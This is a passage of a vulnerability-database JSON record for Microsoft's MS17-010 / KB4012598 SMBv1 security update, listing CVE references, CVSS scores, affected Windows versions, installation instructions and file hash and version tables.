["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mskb", "idList": ["KB4012598"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", 
"MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-01-01T22:39:28", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-01T22:39:28", "rev": 2}}, "objectVersion": "1.5", "kb": "KB4013389", "msrc": "MS17-010", "mscve": "", "msplatform": "", "msfamily": "", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB2508429", "KB896422", "KB923414", "KB971468", "KB982214", "KB3073921", "KB917159", "KB2536275", "KB957095", "KB3177186", "KB958687", "KB975517"], "parentseeds": [], "msproducts": ["14135", "13230", "14478", "14562", "14113", "13228", "11721", "14210", "15514", "17381", "11728", "19589", "11740", "15511", "16735", "11733", "17508", "11719", "14492", "16710", "17651", "17654", "16730", "19759", "13236", "14496", "14490", "14139", "13233", "14501", "14440", "17360", "18472", "19756", "14136", "16625", "13234", "19754", "17657", "14503", "17344", "18875", "14131", "17542", "11708"], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "b2012b15-7770-3165-b934-5b004ee86f67", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "e51103b3-9b99-948e-95ff-fd63b48f329b", "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "6f18bf60-d0f1-8298-413b-89f6e8170528", "670009af-2bc1-fa29-d4a5-99c02e923013", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "32719e08-ef7b-a697-0697-ec02d753dbb5", "e2b2a040-324c-43bf-447c-75aab15e2570", 
"d21af3d6-5cde-c325-4483-c1810c7a5bdd", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "1b3bc777-c681-e378-d422-eb618baa26f9", "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "b5011041-7904-59f1-97ca-53b1da5812fb", "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "8540b382-5304-d506-ece2-a936dd11d66e", "f62ed778-6986-d76e-c007-40a28315ffbf", "86630540-cb68-b324-567b-e197838cd28b", "928d79ba-72eb-762f-39be-122173e95922", "12db0355-c78b-b1b8-0c13-671906e0652d", "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "fd3a2888-0af1-3691-5303-bc85b4302e62", "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "ceefced2-0d6f-a4bd-50d6-875c871b8250", "9087adda-9d1d-0ba1-1b0b-ad434f940308", "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "4af945c2-8a39-6b82-777b-5067ce2c9216", "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "2994eca6-696c-b523-20de-40b02211bb3b", "417baa75-0c45-df0a-8e65-960580d94f42", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "dc52833c-eac7-25b7-b942-b2dfcfbace09", "2b2eeb95-d89c-6614-0db5-88f09133ede6", "6a967721-27d9-bd5f-9029-99ca5f0436dd"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "name": "Windows 8.1 Pro", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "dc52833c-eac7-25b7-b942-b2dfcfbace09", "name": "Windows Server 2012 R2 Essentials", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "8540b382-5304-d506-ece2-a936dd11d66e", "name": "Windows 10, version 1511, all editions", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": 
"productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "name": "Windows Server 2008 R2 Datacenter", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "12db0355-c78b-b1b8-0c13-671906e0652d", "name": "Windows Server 2016 Essentials", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "6a967721-27d9-bd5f-9029-99ca5f0436dd", "name": "Windows Server 2012 R2 Foundation", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "name": "Windows 7 Home Basic", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "name": "Windows 7 Ultimate", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "e2b2a040-324c-43bf-447c-75aab15e2570", "name": "Windows Server 2012 Foundation", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": 
"28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "name": "Windows Server 2012 R2 Datacenter", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "1b3bc777-c681-e378-d422-eb618baa26f9", "name": "Windows Server 2012 Essentials", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "670009af-2bc1-fa29-d4a5-99c02e923013", "name": "Windows Server 2008 R2 Standard", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "name": "Windows Server 2012 R2 Standard", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "b2012b15-7770-3165-b934-5b004ee86f67", "name": "Windows 8.1", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "e51103b3-9b99-948e-95ff-fd63b48f329b", "name": "Windows 10, version 1607, all editions", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "name": "Windows Server 2016 Standard", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "ceefced2-0d6f-a4bd-50d6-875c871b8250", "name": "Windows Server 2012 Datacenter", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "4af945c2-8a39-6b82-777b-5067ce2c9216", "name": "Windows Server 2012 Standard", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "name": "Windows 7 Enterprise", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "86630540-cb68-b324-567b-e197838cd28b", "name": "Windows RT 8.1", "parent": "13d0da43-f4d6-9f8e-d090-ed3881084c6e", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", 
"parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "b5011041-7904-59f1-97ca-53b1da5812fb", "name": "Windows 7 Starter", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "name": "Windows 10", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "2994eca6-696c-b523-20de-40b02211bb3b", "name": "Windows Server 2008 R2 Enterprise", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "6f18bf60-d0f1-8298-413b-89f6e8170528", "name": "Windows 7 Professional", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "32719e08-ef7b-a697-0697-ec02d753dbb5", "name": "Windows Server 2008 R2 Web Edition", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "name": "Windows Server 2008 R2 Foundation", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, 
{"id": "417baa75-0c45-df0a-8e65-960580d94f42", "name": "Windows Server 2008 R2 Service Pack 1", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "name": "Windows 7 Home Premium", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "name": "Windows 8.1 Enterprise", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "name": "Windows Server 2016", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "_object_type": "robots.models.microsoftKB.MicrosoftKBBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.microsoftKB.MicrosoftKBBulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": 
"COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "5f532a3fc4f1ea403f37070f59a7a53a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "f96bf1d801552d52091ad0866ebdf356"}, {"key": "href", "hash": "ba4b35c5b6cbeae7458c44303b393638"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3a3a69118b5452ccfeb3abf80705c731"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "140864078aeca1c7c35b4beb33c53c34"}, {"key": "title", "hash": "5a498871a848d25d798ef27dcbd52a89"}, {"key": "type", "hash": "5ee5f53b9d07be79a50e7281a2bfec4e"}], "scheme": null}, {"id": "KB4012598", "vendorId": null, "hash": "117c5430f03c6e810022aeea1f9a9229", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis 
security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. 
\n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-12T13:08:44", "history": [{"bulletin": {"id": "KB4012598", "vendorId": null, "hash": 
"92a1fae50fb87d768e094469afe2ce72672359fe9fe4427d0066d05a0596a1bc", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important <br/><br/></span><ul class=\"sbody-free_list\"> <li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Get security updates automatically</a>. <br/><br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span></span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><formatting type=\"H3\">File 
hash information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4012598-ia64.msu</td><td>83A6F5A70588B27623B11C42F1C8124A25D489DE</td><td>29B40D7E75186A9CCC9F2F309417E374846F35F41B4D1DE6DBE85F439DC1837F</td></tr><tr><td>Windows6.0-KB4012598-x64.msu</td><td>6A186BA2B2B98B2144B50F88BAF33A5FA53B5D76</td><td>A91A0AF728225FF2A630B9ABA4E639473AA8ABE7CAA23BE10AE48A7887BDE9C8</td></tr><tr><td>Windows6.0-KB4012598-x86.msu</td><td>13E9B3D77BA5599764C296075A796C16A85C745C</td><td>FC7F28A72C117C2A8ECE5916532048C8BF3379C86386348C24319EAC2C6B23C8</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H3\">File information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><boilerplate boilerplatename=\"QFEFileAttributes\" version=\"7\">The English (United States) version of this software update installs files that have the attributes that are listed in the following tables.</boilerplate><formatting type=\"H4\">Windows Vista and Windows Server 2008 file information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><formatting type=\"B\">Notes: </formatting>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><formatting type=\"H5\">For all supported ia64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong 
class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>15:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:01</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>16:55</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:14</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:35</td><td>IA-64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:16</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>297,984</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>297,984</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>967,168</td><td>11-Feb-2017</td><td>15:31</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>969,216</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>468,480</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>474,624</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not 
